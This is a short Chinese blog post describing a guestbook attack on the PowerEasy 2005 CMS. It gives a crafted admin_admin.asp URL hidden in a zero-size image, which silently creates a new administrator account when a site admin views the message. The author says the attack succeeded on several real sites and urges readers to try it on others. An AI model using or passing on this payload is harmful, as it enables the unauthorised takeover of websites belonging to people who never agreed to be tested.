 

通杀动易2005的 XSS 攻击 _入侵防御_网络安全_

2024-03-23 11:25:48 浏览量(119)

动易2005里面，留言的时候存在一个XSS。攻击方法如下：首先在网站注册一个普通会员，然后去GUESTBOOK留言，在插入图片的时候地址写上(建议在原代码里面把图片的高度与宽度都设置成0，这样在图片前面加上这个连接，基本上就看不见图片了，图片的连接却被管理员解吸执行了)： http://localhost/PowerEasy/admin/admin_admin.asp?AdminName=xiaod&username=xiaod&password=123456&pwdconfirm=123456&purview=1&Action=SaveAdd 上面是本地测试地址。只要你的留言写的足够诱惑，只要管理员一看，就OK了，他回复了你，你就是后台管理员了··· 我自己测试了几个站，结果都成功了，呵呵。大家也可以去测试一下，通杀了 SQL 与AC版···

【声明】：本博客不参与任何交易，也非中介，仅记录个人感兴趣的主机测评结果和优惠活动，内容均不作直接、间接、法定、约定的保证。访问本博客请务必遵守有关互联网的相关法律、规定与规则。一旦您访问本博客，即表示您已经知晓并接受了此声明通告。

分享到